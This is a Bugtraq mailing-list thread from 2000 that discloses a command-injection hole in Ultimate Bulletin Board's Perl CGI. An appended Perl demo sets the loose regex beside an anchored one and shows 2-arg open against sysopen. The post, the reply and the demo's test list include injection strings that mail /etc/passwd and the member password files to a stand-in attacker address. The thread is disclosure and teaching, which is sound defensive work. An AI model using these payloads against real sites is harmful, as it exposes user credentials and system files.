Bugtraq mailing list archives
Re: perl-cgi hole in UltimateBB by Infopop Corp.
From: khill () BIGFOOT COM (Kevin Hillabolt)
Date: Mon, 14 Feb 2000 18:46:11 -0600
It works on the full version also... Slightly different syntax:

    topic=012345.cgi|cat%20../Members/*|mail hacker@evil.org|

(Note the ../ on Members: you have to go up a directory to get the file. Maybe you could stop it via simple folder permissions??)

Regards,
Kevin Hillabolt

----- Original Message -----
From: "Sergei A. Golubchik" <serg@INFOMAG.APE.RELARN.RU>
To: <BUGTRAQ@securityfocus.com>
Sent: Friday, February 11, 2000 1:49 PM
Subject: perl-cgi hole in UltimateBB by Infopop Corp.
Hello.

Writing cgi scripts in perl is simple. It's also rather safe, providing authors follow very simple instructions. But they don't.

Browsing some site, I found that their forums were based not on home-made scripts but on a commercial software product. Hey, I said to myself, remember that story about the pcweek hack? They used the commercial package photoads. Let's look at what this Ultimate Bulletin Board by Infopop is.

I grabbed the freeware version from http://www.ultimatebb.com and after 10 minutes of grepping found these lines:

    ubb_library.pl:901-902
    if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
      open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");

(Notice? Not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while writing it? Girls?)

And $ThreadFile takes its value directly from the hidden (hmm!) field `topic'. So when I filled in the form with

    topic='012345.ubb|mail hacker@evil.com </etc/passwd|'

it happily gave me /etc/passwd. And

    topic='012345.ubb|cat Members/*|mail hacker@evil.org|'

shows all users of the bulletin board, and their passwords too (in cleartext!).

So one need only open the "reply" form in the forum, save it to disk, and set the topic field to whatever he wants. And this stupid UBB (at least the freeware version) doesn't keep logs (except the so-called hacklog, used when the condition above is not met).

The fix is obvious. But the rule of thumb is "do not use magic perl open", at least in cgi scripts. If you want to open a regular file, sysopen does the trick as well. And again: CHECK EVERYTHING!

Regards,
SerG.

P.S. Vendor was notified.
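As an added example (not code from the original post or from UBB), the script below puts the unanchored check quoted in the advisory beside an anchored one, shows why Perl's 2-argument open is "magic" when the name ends in `|`, and reads a thread file the hardened way with sysopen. The temporary forum layout, `$number`, the function names, and the sample topic strings are assumptions for the demo; the pipe demonstration runs a harmless echo rather than the mail command from the post.

```perl
#!/usr/bin/perl
# Added example, not code from the original post or from UBB.
# Shows (1) the unanchored regex from the advisory beside an anchored one,
# (2) why 2-arg open is "magic", and (3) a hardened read via sysopen.
use strict;
use warnings;
use Fcntl qw(O_RDONLY);
use File::Spec;
use File::Temp qw(tempdir);

# Assumed forum layout for the demo; real UBB paths differ.
my $ForumsPath = tempdir(CLEANUP => 1);
my $number     = 1;
my $forum_dir  = File::Spec->catdir($ForumsPath, "Forum$number");
mkdir $forum_dir or die "mkdir $forum_dir: $!";

# The check as quoted in the advisory: a match anywhere in the string is enough.
sub loose_ok {
    my ($ThreadFile) = @_;
    return $ThreadFile =~ /\d\d\d\d\d\d\.ubb/ ? 1 : 0;
}

# Anchored: the whole value must be exactly six digits plus ".ubb".
sub strict_ok {
    my ($ThreadFile) = @_;
    return $ThreadFile =~ /^\d{6}\.ubb$/ ? 1 : 0;
}

# 2-arg open interprets a trailing '|' as "run this command and read its
# output"; 3-arg open with an explicit '<' mode treats the string as a
# plain file name. Uses a harmless echo, not the mail pipeline from the post.
sub magic_open_demo {
    my $name = 'echo run-as-a-command|';
    open(my $two, $name) or die "2-arg open failed: $!";
    my $out = <$two>;
    close $two;
    my $three_ok = open(my $three, '<', $name) ? 1 : 0;   # no such file, so 0
    return ($out, $three_ok);
}

# Hardened read: validate first, build the path from parts, sysopen read-only.
sub read_thread {
    my ($ThreadFile) = @_;
    die "bad topic: $ThreadFile\n" unless strict_ok($ThreadFile);
    my $path = File::Spec->catfile($forum_dir, $ThreadFile);
    sysopen(my $fh, $path, O_RDONLY) or die "open $path: $!\n";
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Constructed sample inputs: one honest topic, the two strings from the
# advisory, and the ../ traversal from the reply adapted to the .ubb suffix.
my @topics = (
    '012345.ubb',
    '012345.ubb|mail hacker@evil.com </etc/passwd|',
    '012345.ubb|cat Members/*|mail hacker@evil.org|',
    '012345.ubb|cat ../Members/*|mail hacker@evil.org|',
);
for my $t (@topics) {
    printf "%-52s loose=%d strict=%d\n", $t, loose_ok($t), strict_ok($t);
}

my ($out, $three_ok) = magic_open_demo();
print "2-arg open read: $out";
print "3-arg open of the same string succeeded: $three_ok\n";

# Write one thread file, then read it back through the hardened path and
# show the injection string being rejected before any open happens.
open(my $w, '>', File::Spec->catfile($forum_dir, '012345.ubb')) or die "write: $!";
print $w "thread body\n";
close $w;
print "read back: ", read_thread('012345.ubb');
eval { read_thread($topics[1]) };
print "rejected: $@";
```

Every injected topic passes `loose_ok` because the unanchored pattern only needs `012345.ubb` to appear somewhere in the string; `strict_ok` rejects all three. The second point is independent of the regex: even a well-formed name can become a command under 2-argument open if an attacker controls its ending, which is why the hardened reader uses sysopen (a 3-argument open with an explicit `'<'` mode behaves the same way).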